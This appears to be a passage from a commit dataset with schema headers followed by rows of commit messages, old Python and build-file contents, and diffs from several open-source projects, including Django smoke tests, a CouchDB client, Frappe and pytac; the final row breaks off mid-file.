commit
stringlengths
40
40
subject
stringlengths
1
3.25k
old_file
stringlengths
4
311
new_file
stringlengths
4
311
old_contents
stringlengths
0
26.3k
lang
stringclasses
3 values
proba
float64
0
1
diff
stringlengths
0
7.82k
077119989abb6b176c6b77ae8f4e1003769152b2
Fix #2 - wrong exception handling
django_smoke_tests/management/commands/smoke_tests.py
django_smoke_tests/management/commands/smoke_tests.py
import argparse import os from django.core.management import BaseCommand, CommandParser from django.core.management.base import CommandError from ...generator import SmokeTestsGenerator class Command(BaseCommand): help = "Smoke tests for Django endpoints." def create_parser(self, prog_name, subcommand): """ Override in order to skip default parameters like verbosity, version, etc. """ parser = CommandParser( self, prog="%s %s" % (os.path.basename(prog_name), subcommand), description=self.help or None, ) # create hidden options (required by BaseCommand) parser.add_argument('--no-color', help=argparse.SUPPRESS) parser.add_argument('--settings', help=argparse.SUPPRESS) parser.add_argument('--pythonpath', help=argparse.SUPPRESS) self.add_arguments(parser) return parser def add_arguments(self, parser): methods_group = parser.add_mutually_exclusive_group() methods_group.add_argument( '--http-methods', default=None, type=str, help='comma separated HTTP methods that will be executed for all endpoints, ' 'eg. GET,POST,DELETE [default: GET,POST,PUT,DELETE]' ) methods_group.add_argument( '-g', '--get-only', action='store_true', default=False, dest='get_only', help='shortcut for --http-methods GET' ) parser.add_argument( '--allow-status-codes', default=None, type=str, help='comma separated HTTP status codes that will be considered as success responses, ' 'eg. 200,201,204 [default: 200,201,301,302,304,405]' ) parser.add_argument( '--disallow-status-codes', default=None, type=str, help='comma separated HTTP status codes that will be considered as fail responses, ' 'eg. 404,500' ) parser.add_argument( '--no-db', dest='no_db', action='store_true', help='flag for skipping database creation' ) parser.set_defaults(no_db=False) parser.add_argument( 'app_names', default=None, nargs='?', help='names of apps to test', ) def handle(self, *args, **options): if options.get('get_only'): methods_to_test = ['GET'] else: methods_to_test = self._get_list_from_string(options.get('http_methods')) allowed_status_codes = self._get_list_from_string(options.get('allow_status_codes')) disallowed_status_codes = self._get_list_from_string(options.get('disallow_status_codes')) use_db = not options.get('no_db') app_names = self._get_list_from_string(options.get('app_names')) if allowed_status_codes and disallowed_status_codes: raise CommandError( 'You can either specify --allow-status-codes or --disallow-status-codes. ' 'You must not specify both.' ) generator = SmokeTestsGenerator( http_methods=methods_to_test, allowed_status_codes=allowed_status_codes, disallowed_status_codes=disallowed_status_codes, use_db=use_db, app_names=app_names, ) generator.execute() if generator.warnings: self.stdout.write( 'Some tests were skipped. Please report on ' 'https://github.com/kamilkijak/django-smoke-tests/issues.' ) self.stdout.write('\n'.join(generator.warnings)) @staticmethod def _get_list_from_string(options): """ Transforms comma separated string into a list of those elements. Transforms strings to ints if they are numbers. Eg.: "200,'400','xxx'" => [200, 400, 'xxx'] """ if options: return [ int(option) if option.isdigit() else option.strip('/') for option in options.split(',') ] return None
Python
0.000001
@@ -829,32 +829,99 @@ parse.SUPPRESS)%0A + parser.add_argument('--traceback', help=argparse.SUPPRESS)%0A self.add
443e1fab3c79ccf6a40bf01393fe4dad399926d2
add tags to local item
pystash/common.py
pystash/common.py
# -*- coding: utf-8 -*- import os import sys import shelve import abc import time from clint.textui import colored def output(message, color='white', text_only=False): if text_only: return str(getattr(colored, color)(message)) else: sys.stdout.write(str(getattr(colored, color)(message))) class StashedItem(): """ Incapsulate all operations with single item from Stash """ def __init__(self, elem, index=None, numbered=False): self.elem = elem self.value = elem['value'] if 'tags' in elem: self.tags = elem['tags'] else: self.tags = [] self.is_list = isinstance(elem['value'], list) if (index is not None and not self.is_list) or len(elem['value']) <= index: raise IndexError self.numbered = numbered self.index = index def get_value(self): return self.elem['value'] if not self.index else \ self.elem['value'][self.index] if not 'marked' in self.elem['meta'] else self.elem['value'][self.index][0] def get_tags(self): if 'tags' in self.elem: return self.elem['tags'] else: return [] def __repr__(self): if self.is_list: if 'marked' in self.elem['meta']: # it will be uncommented after implementing marked lists #result = self.__assemble_marked_list() result = self.__assemble_unmarked_list() else: result = self.__assemble_unmarked_list() else: result = self.elem['value'] return '%s\n' % result def __assemble_marked_list(self): result = [] template = '{mark} {data}' for item in self.elem['value']: mark = '+' if item[1] else '-' result.append(template.format(mark=mark, data=item[0])) return self.list_to_string(result, self.numbered) def __assemble_unmarked_list(self): result = [] for item in self.elem['value']: result.append(item) return self.list_to_string(result, self.numbered) @staticmethod def list_to_string(items, is_numbered): if is_numbered: return '\n'.join(['{}. {}'.format(n+1, item) for n, item in enumerate(items)]) else: return '\n'.join(items) class AbstractStorage(object): # todo: update methods signature """ Here will be a docstring """ __metaclass__ = abc.ABCMeta @abc.abstractmethod def get_connection(self, db): pass @abc.abstractmethod def add(self, key, value, tags): """Returns created item as StashedItem""" @abc.abstractmethod def update(self, item_name, value, index=None): """Returns updated item as StashedItem""" @abc.abstractmethod def delete(self, item_name, index=None): """Returns Boolean""" @abc.abstractmethod def get(self, item_name, index=None): """Returns item as StashedItem""" @abc.abstractmethod def get_all(self): pass @abc.abstractmethod def is_list(self, item_name): pass @abc.abstractmethod def exist(self, item_name): pass @abc.abstractmethod def get_database_data(self): """ Return whole db data as python dict for sync """ pass class NotListException(Exception): pass class ShelveStorage(AbstractStorage): """ Storage implementation for work with python shelve library """ DBFILE = os.path.join(os.path.expanduser('~'), '.stash', 'stash.db') def __init__(self, db_file=None): self.DBFILE = db_file if db_file is not None else self.DBFILE path_to_dir = os.path.join('/', *self.DBFILE.split('/')[1:-1]) if not os.path.exists(path_to_dir): os.makedirs(path_to_dir, 0755) self.connection = self.get_connection(self.DBFILE) if not 'storage' in self.connection: self.connection['storage'] = {} if not 'last_sync' in self.connection: self.connection['last_sync'] = 0 if not 'last_update' in self.connection: self.connection['last_update'] = 0 self.db = self.connection['storage'] self.last_sync = self.connection['last_sync'] self.last_update = self.connection['last_update'] def get_connection(self, db): return shelve.open(db, writeback=True) def update(self, item_name, value, tags, index=None, overwrite=False): if index is not None: index -= 1 item = self.db[item_name]['value'] if not isinstance(item, list): raise NotListException elif index > len(item): raise IndexError if index == len(item): self.db[item_name]['value'].append(value) else: self.db[item_name]['value'][index] = value else: if isinstance(self.db[item_name]['value'], list) and not overwrite: self.db[item_name]['value'].append(value) self.db[item_name]['tags'].append(tags) else: self.db[item_name]['value'] = value self.db[item_name]['tags'] = tags self.db[item_name]['updated'] = int(time.time()) #self.db[item_name]['tags'] = tags self.last_update = int(time.time()) return StashedItem(self.db[item_name], index) def delete(self, item_name, index=None): if index is not None: index -= 1 if not isinstance(self.db[item_name]['value'], list): raise NotListException self.db[item_name]['value'].pop(index) self.db[item_name]['value']['updated'] = int(time.time()) else: del self.db[item_name] self.last_update = int(time.time()) return True def add(self, key, value, tags): self.db[key] = {'value': value, 'updated': int(time.time())} self.last_update = int(time.time()) return StashedItem(self.db[key]) def add_dict(self, newdict): self.db.clear() for key in newdict: self.db[key] = newdict[key] self.last_update = int(time.time()) return def exist(self, item_name, index=None): if item_name in self.db: if index is not None: try: self.db[item_name]['value'][index] except IndexError: return False return True return False def is_list(self, item_name): return isinstance(self.db[item_name]['value'], list) def get(self, item_name, index=None): index = index - 1 if index is not None else None item = self.db[item_name] return StashedItem(item, index) def get_all(self): result = {} for k, v in self.db.iteritems(): result[k] = StashedItem(v) return result def tags(self, tag): result = {} for k, v in self.db.iteritems(): if 'tags' in v: if tag in v['tags']: result[k] = StashedItem(v) return result def alltags(self): result = [] for k, v in self.db.iteritems(): if 'tags' in v: for tag in v['tags']: result.append(tag) return result def get_database_data(self): return dict(self.connection) def set_database_data(self, data): #TODO check this out self.connection['storage'] = data return True
Python
0
@@ -6024,16 +6024,32 @@ .time()) +, 'tags' : tags %7D%0A
b47143d38027a7bafc73376de01bd2fa2196ac60
Add test for file interface in put_attachment
couchdb/tests/client.py
couchdb/tests/client.py
# -*- coding: utf-8 -*- # # Copyright (C) 2007 Christopher Lenz # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. import doctest import os import unittest from couchdb import client class DatabaseTestCase(unittest.TestCase): def setUp(self): uri = os.environ.get('COUCHDB_URI', 'http://localhost:5984/') self.server = client.Server(uri) if 'python-tests' in self.server: del self.server['python-tests'] self.db = self.server.create('python-tests') def tearDown(self): if 'python-tests' in self.server: del self.server['python-tests'] def test_doc_id_quoting(self): self.db['foo/bar'] = {'foo': 'bar'} self.assertEqual('bar', self.db['foo/bar']['foo']) del self.db['foo/bar'] self.assertEqual(None, self.db.get('foo/bar')) def test_unicode(self): self.db[u'føø'] = {u'bår': u'Iñtërnâtiônàlizætiøn', 'baz': 'ASCII'} self.assertEqual(u'Iñtërnâtiônàlizætiøn', self.db[u'føø'][u'bår']) self.assertEqual(u'ASCII', self.db[u'føø'][u'baz']) def test_doc_revs(self): doc = {'bar': 42} self.db['foo'] = doc old_rev = doc['_rev'] doc['bar'] = 43 self.db['foo'] = doc new_rev = doc['_rev'] new_doc = self.db.get('foo') self.assertEqual(new_rev, new_doc['_rev']) new_doc = self.db.get('foo', rev=new_rev) self.assertEqual(new_rev, new_doc['_rev']) old_doc = self.db.get('foo', rev=old_rev) self.assertEqual(old_rev, old_doc['_rev']) def test_attachment_crud(self): doc = {'bar': 42} self.db['foo'] = doc old_rev = doc['_rev'] self.db.put_attachment(doc, 'foo.txt', 'Foo bar', 'text/plain') self.assertNotEquals(old_rev, doc['_rev']) doc = self.db['foo'] attachment = doc['_attachments']['foo.txt'] self.assertEqual(len('Foo bar'), attachment['length']) self.assertEqual('text/plain', attachment['content_type']) self.assertEqual('Foo bar', self.db.get_attachment(doc, 'foo.txt')) self.assertEqual('Foo bar', self.db.get_attachment('foo', 'foo.txt')) old_rev = doc['_rev'] self.db.delete_attachment(doc, 'foo.txt') self.assertNotEquals(old_rev, doc['_rev']) self.assertEqual(None, self.db['foo'].get('_attachments')) def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(DatabaseTestCase, 'test')) suite.addTest(doctest.DocTestSuite(client)) return suite if __name__ == '__main__': unittest.main(defaultTest='suite')
Python
0.000001
@@ -248,16 +248,32 @@ unittest +%0Aimport StringIO %0A%0Afrom c @@ -2495,16 +2495,903 @@ ents'))%0A + %0A def test_attachment_crud_with_files(self):%0A doc = %7B'bar': 42%7D%0A self.db%5B'foo'%5D = doc%0A old_rev = doc%5B'_rev'%5D%0A f = StringIO.StringIO('Foo bar baz')%0A %0A self.db.put_attachment(doc, 'foo.txt', f, 'text/plain')%0A self.assertNotEquals(old_rev, doc%5B'_rev'%5D)%0A%0A doc = self.db%5B'foo'%5D%0A attachment = doc%5B'_attachments'%5D%5B'foo.txt'%5D%0A self.assertEqual(len('Foo bar baz'), attachment%5B'length'%5D)%0A self.assertEqual('text/plain', attachment%5B'content_type'%5D)%0A%0A self.assertEqual('Foo bar baz', self.db.get_attachment(doc, 'foo.txt'))%0A self.assertEqual('Foo bar baz', self.db.get_attachment('foo', 'foo.txt'))%0A%0A old_rev = doc%5B'_rev'%5D%0A self.db.delete_attachment(doc, 'foo.txt')%0A self.assertNotEquals(old_rev, doc%5B'_rev'%5D)%0A self.assertEqual(None, self.db%5B'foo'%5D.get('_attachments')) %0A%0Adef su
2dcfccd75c49a4f375d49a52bff5d33cd971e8b6
Update install.py
frappe/utils/install.py
frappe/utils/install.py
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals import frappe import getpass def before_install(): frappe.reload_doc("core", "doctype", "docfield") frappe.reload_doc("core", "doctype", "docperm") frappe.reload_doc("core", "doctype", "doctype") def after_install(): # reset installed apps for re-install frappe.db.set_global("installed_apps", '["frappe"]') # core users / roles install_docs = [ {'doctype':'User', 'name':'Administrator', 'first_name':'Administrator', 'email':'[email protected]', 'enabled':1}, {'doctype':'User', 'name':'Guest', 'first_name':'Guest', 'email':'[email protected]', 'enabled':1}, {'doctype':'UserRole', 'parent': 'Administrator', 'role': 'Administrator', 'parenttype':'User', 'parentfield':'user_roles'}, {'doctype':'UserRole', 'parent': 'Guest', 'role': 'Guest', 'parenttype':'User', 'parentfield':'user_roles'}, {'doctype': "Role", "role_name": "Report Manager"}, {'doctype': "Workflow State", "workflow_state_name": "Pending", "icon": "question-sign", "style": ""}, {'doctype': "Workflow State", "workflow_state_name": "Approved", "icon": "ok-sign", "style": "Success"}, {'doctype': "Workflow State", "workflow_state_name": "Rejected", "icon": "remove", "style": "Danger"}, {'doctype': "Workflow Action", "workflow_action_name": "Approve"}, {'doctype': "Workflow Action", "workflow_action_name": "Reject"}, {'doctype': "Workflow Action", "workflow_action_name": "Review"}, {'doctype': "Email Account", "email_id": "[email protected]", "default_outgoing": 1}, {'doctype': "Email Account", "email_id": "[email protected]", "default_incoming": 1} ] from frappe.core.doctype.file.file import make_home_folder make_home_folder() for d in install_docs: try: frappe.get_doc(d).insert() except frappe.NameError: pass import_country_and_currency() # save default print setting print_settings = frappe.get_doc("Print Settings") print_settings.save() # all roles to admin frappe.get_doc("User", "Administrator").add_roles(*frappe.db.sql_list("""select name from tabRole""")) # update admin password from frappe.auth import _update_password _update_password("Administrator", get_admin_password()) # setup wizard now in frappe frappe.db.set_default('desktop:home_page', 'setup-wizard'); frappe.db.commit() def get_admin_password(): def ask_admin_password(): admin_password = getpass.getpass("Set Administrator password: ") admin_password2 = getpass.getpass("Re-enter Administrator password: ") if not admin_password == admin_password2: print "\nPasswords do not match" return ask_admin_password() return admin_password admin_password = frappe.conf.get("admin_password") if not admin_password: return ask_admin_password() return admin_password def before_tests(): frappe.db.sql("delete from `tabCustom Field`") frappe.db.sql("delete from `tabEvent`") frappe.db.commit() frappe.clear_cache() def import_country_and_currency(): from frappe.geo.country_info import get_all from frappe.utils import update_progress_bar data = get_all() for i, name in enumerate(data): update_progress_bar("Updating country info", i, len(data)) country = frappe._dict(data[name]) add_country_and_currency(name, country) print # enable frequently used currencies for currency in ("INR", "USD", "GBP", "EUR", "AED", "AUD", "JPY", "CNY", "CHF"): frappe.db.set_value("Currency", currency, "enabled", 1) def add_country_and_currency(name, country): if not frappe.db.exists("Country", name): frappe.get_doc({ "doctype": "Country", "country_name": name, "code": country.code, "date_format": country.date_format or "dd-mm-yyyy", "time_zones": "\n".join(country.timezones or []), "docstatus": 0 }).db_insert() if country.currency and not frappe.db.exists("Currency", country.currency): frappe.get_doc({ "doctype": "Currency", "currency_name": country.currency, "fraction": country.currency_fraction, "symbol": country.currency_symbol, "fraction_units": country.currency_fraction_units, "smallest_currency_fraction_value": country.smallest_currency_fraction_value, "number_format": country.number_format, "docstatus": 0 }).db_insert()
Python
0.000001
@@ -1557,37 +1557,255 @@ 'doctype': %22 -Email Account +Domain%22, %22domain_name%22:%22example.com%22, %22email_id%22: %[email protected]%22, %22password%22: %22pass%22, %22email_server%22: %22imap.example.com%22,%22use_imap%22: 1, %22smtp_server%22: %22smtp.example.com%22%7D,%0A%09%09%7B'doctype': %22Email Account%22, %22domain%22:%22example.com %22, %22email_id @@ -1890,16 +1890,40 @@ ccount%22, + %22domain%22:%22example.com%22, %22email_
43f67a09d0e194ef3012bad97e0cb45db7c34d35
test travis
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "addon", "sources": [ "src/addon.cc", "src/object.cc", "src/async.cc", "src/engine.cc", "src/results.cc" ], #"cflags": [ "-Werror", "-Wall", "-Wextra", "-Wpedantic", "-Wunused-parameter", "-funroll-loops", "-Ofast" ],#targets all files, c and c++ #"cflags_c": [ "-hello" ],# does this do anything? #"cflags_cc": [ "-Werror", "-Wall", "-Wextra", "-Wpedantic", "-Wunused-parameter", "-funroll-loops", "-Ofast" ],#target c++ only "cflags": [ "-O2", ], "cflags!": [ "-fno-exceptions", "-Wno-unused-parameter", "-O3", "-std=gnu++1y"], "cflags_cc!": [ "-fno-exceptions", "-Wno-unused-parameter" ], "include_dirs": ["<!@(node -p \"require('node-addon-api').include\")"], "dependencies": ["<!(node -p \"require('node-addon-api').gyp\")"], "defines": [ "NAPI_CPP_EXCEPTIONS", "NODE_ADDON_API_DISABLE_DEPRECATED" ], "conditions": [ ["OS==\"win\"", { "msvs_settings": { "VCCLCompilerTool": { "ExceptionHandling": 1 } } }], ["OS==\"mac\"", { "xcode_settings": { "CLANG_CXX_LANGUAGE_STANDARD": 'c++14', "CLANG_CXX_LIBRARY": "libc++", "GCC_ENABLE_CPP_EXCEPTIONS": "YES", "MACOSX_DEPLOYMENT_TARGET": "10.7", "GCC_ENABLE_CPP_RTTI" : "YES", # options to test: "fast", "3", "2", "1", "0", "", "s" #"GCC_OPTIMIZATION_LEVEL": "1", # only passed to C files "OTHER_CFLAGS" : [], # only passed to C++ files "OTHER_CPLUSPLUSFLAGS": [ "-Werror", "-Wextra", "-Wpedantic", "-Wunused-parameter", #"-Weverything" #"-fdiagnostics-show-hotness", #"-fsave-optimization-record" ], } }] ] } ] }
Python
0.000002
@@ -545,16 +545,30 @@ %22-O2%22, +%22-std=gnu++14%22 %5D,%0A @@ -633,24 +633,8 @@ -O3%22 -, %22-std=gnu++1y%22 %5D,%0A
4d0d8862b6741e6a34eb28eeb8d4f6e8861903e8
Print sensible message if trying to load lattice without cothread.
pytac/load_csv.py
pytac/load_csv.py
"""Module to load the elements of the machine from multiple csv files stored in the same directory.""" import os import csv from pytac import lattice, element, device, units, utils import collections def get_div_rigidity(energy): rigidity = utils.rigidity(energy) def div_rigidity(input): return input / rigidity return div_rigidity def get_mult_rigidity(energy): rigidity = utils.rigidity(energy) def mult_rigidity(input): return input * rigidity return mult_rigidity def load_unitconv(directory, mode, lattice): """Load the unit conversion objects from a file. Args: directory(string): The directory where the data is stored. mode(string): The name of the mode that is used. lattice(Lattice): The lattice object that will be used. """ data = collections.defaultdict(list) uc = {} with open(os.path.join(directory, mode, 'uc_poly_data.csv')) as poly: csv_reader = csv.DictReader(poly) for item in csv_reader: data[(int(item['uc_id']))].append((int(item['coeff']), float(item['val']))) for d in data: u = units.PolyUnitConv([x[1] for x in reversed(sorted(data[d]))]) uc[d] = u data.clear() with open(os.path.join(directory, mode, 'uc_pchip_data.csv')) as pchip: csv_reader = csv.DictReader(pchip) for item in csv_reader: data[(int(item['uc_id']))].append((float(item['eng']), float(item['phy']))) for d in data: eng = [x[0] for x in sorted(data[d])] phy = [x[1] for x in sorted(data[d])] u = units.PchipUnitConv(eng, phy) uc[d] = u with open(os.path.join(directory, mode, 'unitconv.csv')) as unitconv: csv_reader = csv.DictReader(unitconv) for item in csv_reader: element = lattice[int(item['el_id']) - 1] if 'QUAD' in element.families or 'SEXT' in element.families: uc[int(item['uc_id'])].f1 = get_div_rigidity(lattice.get_energy()) uc[int(item['uc_id'])].f2 = get_mult_rigidity(lattice.get_energy()) element._uc[item['field']] = uc[int(item['uc_id'])] def load(mode, control_system=None, directory=None): """Load the elements of a lattice from a directory. Args: mode(string): The name of the mode to be loaded. control_system(ControlSystem): The control system to be used. If none is provided an EpicsControlSystem will be created. directory(string): Directory where to load the files from. If no directory is given the data directory at the root of the repository is used. Returns: Lattice: The lattice containing all elements. """ if control_system is None: # Don't import epics unless we need it to avoid unnecessary # installation of cothread from pytac import epics control_system = epics.EpicsControlSystem() if directory is None: directory = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data') lat = lattice.Lattice(mode, control_system, 3000) with open(os.path.join(directory, mode, 'elements.csv')) as elements: csv_reader = csv.DictReader(elements) for item in csv_reader: cell = int(item['cell']) if item['cell'] else None e = element.Element(item['name'], float(item['length']), item['type'], cell) e.add_to_family(item['type']) lat.add_element(e) with open(os.path.join(directory, mode, 'devices.csv')) as devices: csv_reader = csv.DictReader(devices) for item in csv_reader: name = item['name'] enable_pv = item['enable_pv'] enable_value = item['enable_value'] get_pv = item['get_pv'] set_pv = item['set_pv'] pve = True if enable_pv and enable_value: pve = device.PvEnabler(enable_pv, enable_value, control_system) d = device.Device(name, control_system, pve, get_pv, set_pv) lat[int(item['id']) - 1].add_device(item['field'], d, control_system) with open(os.path.join(directory, mode, 'families.csv')) as families: csv_reader = csv.DictReader(families) for item in csv_reader: lat[int(item['id']) - 1].add_to_family(item['family']) if os.path.exists(os.path.join(directory, mode, 'unitconv.csv')): load_unitconv(directory, mode, lat) return lat
Python
0
@@ -96,16 +96,65 @@ ory.%22%22%22%0A +from __future__ import print_function%0Aimport sys%0A import o @@ -2756,24 +2756,37 @@ ts.%0A %22%22%22%0A + try:%0A if contr @@ -2812,16 +2812,20 @@ + + # Don't @@ -2884,16 +2884,20 @@ + # instal @@ -2923,16 +2923,20 @@ + + from pyt @@ -2951,16 +2951,20 @@ t epics%0A + @@ -3007,16 +3007,206 @@ ystem()%0A + except ImportError:%0A print(('To load a lattice using the default control system,'%0A ' please install cothread.'),%0A file=sys.stderr)%0A return None%0A if d @@ -3299,16 +3299,49 @@ ile__)), +%0A 'data')
ff9822c7776cdef1e14e80a2cc56700bbc4f24f2
Fix Mac OS build warnings on old node versions
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "anitomy-js", "sources": [ "lib/anitomy/anitomy/anitomy.cpp", "lib/anitomy/anitomy/anitomy.h", "lib/anitomy/anitomy/element.cpp", "lib/anitomy/anitomy/element.h", "lib/anitomy/anitomy/keyword.cpp", "lib/anitomy/anitomy/keyword.h", "lib/anitomy/anitomy/options.h", "lib/anitomy/anitomy/parser.cpp", "lib/anitomy/anitomy/parser.h", "lib/anitomy/anitomy/parser_helper.cpp", "lib/anitomy/anitomy/parser_number.cpp", "lib/anitomy/anitomy/string.cpp", "lib/anitomy/anitomy/string.h", "lib/anitomy/anitomy/token.cpp", "lib/anitomy/anitomy/token.h", "lib/anitomy/anitomy/tokenizer.cpp", "lib/anitomy/anitomy/tokenizer.h", "src/anitomy_js.h", "src/anitomy_js.cpp", "src/worker.h", "src/worker.cpp", "src/addon.cpp" ], "xcode_settings": { "OTHER_CFLAGS": [ "-mmacosx-version-min=10.7", "-stdlib=libc++", "-std=c++14" ] }, "cflags": [ "-std=c++14" ], "cflags_cc!": [ "-fno-rtti", "-fno-exceptions", "-std=gnu++0x" ], "include_dirs": [ "<!(node -e \"require('nan')\")", "lib/anitomy" ] } ] }
Python
0
@@ -1187,109 +1187,310 @@ %22 -OTHER_CFLAGS%22: %5B%0A %22-mmacosx-version-min=10.7%22,%0A %22-stdlib=libc++ +CLANG_CXX_LANGUAGE_STANDARD%22: %22c++14%22,%0A %22CLANG_CXX_LIBRARY%22: %22libc++%22,%0A %22MACOSX_DEPLOYMENT_TARGET%22: %2210.9%22,%0A %22GCC_ENABLE_CPP_EXCEPTIONS%22: %22NO%22,%0A %22GCC_ENABLE_CPP_RTTI%22: %22NO%22,%0A %22OTHER_CPLUSPLUSFLAGS%22: %5B%0A %22-Wall %22,%0A @@ -1506,33 +1506,26 @@ %22- -std=c++14 +O3 %22%0A @@ -1566,16 +1566,19 @@ %22cflags +_cc %22: %5B%0A @@ -1602,16 +1602,17 @@ d=c++14%22 +, %0A @@ -1617,41 +1617,23 @@ - %5D,%0A - %22cflags_cc!%22: %5B +%22-Wall%22, %0A @@ -1651,18 +1651,11 @@ %22- -fno-rtti%22, +O3%22 %0A @@ -1667,30 +1667,38 @@ - %22-fno-exceptions%22, +%5D,%0A %22cflags_cc!%22: %5B %0A
19d6e96a7039f6959cc9f47ba75c2972136893a5
Update config for email handling
app/config.py
app/config.py
#!/usr/bin/python import json import sys import argparse import os from celery.schedules import crontab def parse_args(): # pragma: no cover parser = argparse.ArgumentParser() parser.add_argument("-e", "--env", default="development", help="environment") return parser.parse_args() def output(stmt): # pragma: no cover print(stmt) def main(argv): args = parse_args() try: output(configs[args.env].PORT) except: output('No environment') class Config(object): DEBUG = False ENVIRONMENT = os.environ.get('ENVIRONMENT', 'development') SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') ADMIN_CLIENT_ID = os.environ.get('ADMIN_CLIENT_ID') ADMIN_CLIENT_SECRET = os.environ.get('ADMIN_CLIENT_SECRET') TOKEN_EXPIRY = os.environ.get('TOKEN_EXPIRY', 60 * 24) # expires every 24 hours APP_SERVER = os.environ.get('APP_SERVER') JWT_SECRET_KEY = os.environ.get('JWT_SECRET') JWT_BLACKLIST_ENABLED = True JWT_BLACKLIST_TOKEN_CHECKS = ['access', 'refresh'] ADMIN_USERS = os.environ.get('ADMIN_USERS') EMAIL_DOMAIN = os.environ.get('EMAIL_DOMAIN') EVENTS_MAX = 30 PROJECT = os.environ.get('PROJECT') STORAGE = os.environ.get('GOOGLE_STORE') PAYPAL_URL = os.environ.get('PAYPAL_URL') PAYPAL_USER = os.environ.get('PAYPAL_USER') PAYPAL_PASSWORD = os.environ.get('PAYPAL_PASSWORD') PAYPAL_RECEIVER = os.environ.get('PAYPAL_RECEIVER') PAYPAL_SIG = os.environ.get('PAYPAL_SIG') PAYPAL_VERIFY_URL = os.environ.get('PAYPAL_VERIFY_URL') EMAIL_PROVIDER_URL = os.environ.get('EMAIL_PROVIDER_URL') EMAIL_PROVIDER_APIKEY = os.environ.get('EMAIL_PROVIDER_APIKEY') EMAIL_TOKENS = json.loads(os.environ.get('EMAIL_TOKENS')) if 'EMAIL_TOKENS' \ in os.environ and os.environ.get('EMAIL_TOKENS')[:1] == '{' else {} EMAIL_SALT = os.environ.get('EMAIL_SALT') EMAIL_UNSUB_SALT = os.environ.get('EMAIL_UNSUB_SALT') TEST_EMAIL = os.environ.get('TEST_EMAIL') FRONTEND_ADMIN_URL = os.environ.get('FRONTEND_ADMIN_URL') API_BASE_URL = os.environ.get('API_BASE_URL') IMAGES_URL = os.environ.get('IMAGES_URL') FRONTEND_URL = os.environ.get('FRONTEND_URL') GOOGLE_APPLICATION_CREDENTIALS = os.environ.get('GOOGLE_APPLICATION_CREDENTIALS') TRAVIS_COMMIT = os.environ.get('TRAVIS_COMMIT') CELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL') CELERY_TIMEZONE = 'Europe/London' CELERY_ENABLE_UTC = True CELERY_ACCEPT_CONTENT = ['json'] CELERY_TASK_SERIALIZER = 'json' CELERYBEAT_SCHEDULE = { 'send-periodic-emails': { 'task': 'send_periodic_emails', 'schedule': crontab(minute=0, hour='*'), }, } EMAIL_DELAY = 1 # hours EMAIL_LIMIT = 400 class Development(Config): DEBUG = True ENVIRONMENT = 'development' SESSION_COOKIE_SECURE = False SESSION_PROTECTION = None PORT = 5000 SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL_development') STORAGE = '{}development'.format(os.environ.get('GOOGLE_STORE')) class Preview(Config): DEBUG = True ENVIRONMENT = 'preview' SESSION_COOKIE_SECURE = False SESSION_PROTECTION = None PORT = 4000 SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL_preview') STORAGE = '{}preview'.format(os.environ.get('GOOGLE_STORE')) class Live(Config): DEBUG = True ENVIRONMENT = 'live' SESSION_COOKIE_SECURE = False SESSION_PROTECTION = None PORT = 8000 SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL_live') STORAGE = '{}live'.format(os.environ.get('GOOGLE_STORE')) configs = { 'development': Development, # 'test': Test, 'preview': Preview, # 'staging': Staging, 'live': Live, # 'production': Live } if __name__ == '__main__': # pragma: no cover main(sys.argv[1:])
Python
0.000001
@@ -2767,16 +2767,70 @@ T = 400%0A + EMAIL_RESTRICT = os.environ.get('EMAIL_RESTRICT')%0A %0A%0Aclass @@ -3113,32 +3113,52 @@ GOOGLE_STORE'))%0A + EMAIL_LIMIT = 3%0A %0A%0Aclass Preview( @@ -3360,16 +3360,16 @@ eview')%0A - STOR @@ -3425,16 +3425,36 @@ TORE'))%0A + EMAIL_LIMIT = 3%0A %0A%0Aclass
961e595cdbed8dc88c14ae55dc4671c0b7c23031
debug print
src/main/python/service_manager/util/services.py
src/main/python/service_manager/util/services.py
import json import logging import os import subprocess from collections import defaultdict from service_manager.util.log_handler import print_red_bold REPO_URL = 'repository_url' REPOSITORY_NAME = 'repository' REPOSITORY_URL = 'repository_url' DESCRIPTION = 'description' ROLE = 'role' APPLICATION = 'application' FQN = 'project_name' SERVICE_TYPE = 'service-type' class Application(dict): def __init__(self, application): super(Application, self).__init__() self.application = application def add_service(self, role, service): self[role] = service def get_contract_test_git_url(self): for name,definition in self.iteritems(): if definition.get_service_type() == 'contract-tests': return definition.get_git_url() class Service(dict): def __init__(self, app, role, definition, app_reference=None): super(Service, self).__init__() self.update(definition) self.app_ref = app_reference self[APPLICATION] = app self[ROLE] = role self[FQN] = self.get_fully_qualified_service_name() def get_fully_qualified_service_name(self): return "{application}-{role}".format(**self).replace(' ','_') def get_description(self): return self[DESCRIPTION] def get_service_type(self): return self[SERVICE_TYPE] def repo_exists(self): return REPOSITORY_URL in self def get_role(self): return self[ROLE] def get_app(self): return self[APPLICATION] def get_repository_name(self): return self[REPOSITORY_NAME] if REPOSITORY_NAME in self else self.get_fully_qualified_service_name() def set_git_url(self, url): self[REPO_URL] = url def get_git_url(self): return self.get(REPO_URL,None) def get_contract_test_git_url(self): return self.app_ref.get_contract_test_git_url() def get_service_directory(self,app_dir): return os.path.join(app_dir,self.get_fully_qualified_service_name()) def load_service_definitions(service_directory, app_filter=None): service_dir = os.path.abspath(service_directory) listdir = os.listdir(service_dir) service_map = defaultdict(dict) for dir in listdir: if _is_valid_app(dir, service_dir) and application_filter(app_filter, dir): service_definition_file = os.path.join(service_dir, dir, 'service.json') if not os.path.exists(service_definition_file): logging.warn("Found invalid application directory - no service.json exists - {}".format(service_dir)) else: service_map[dir] = Application(dir) with open(service_definition_file) as service_def: service_definitions = json.load(service_def) for role, definition in service_definitions.iteritems(): service_map[dir].add_service(role, Service(app=dir, role=role, definition=definition, app_reference=service_map[dir])) return service_map def _is_valid_app(dir, service_dir): return os.path.isdir(os.path.join(service_dir, dir)) and not dir.startswith('.') def 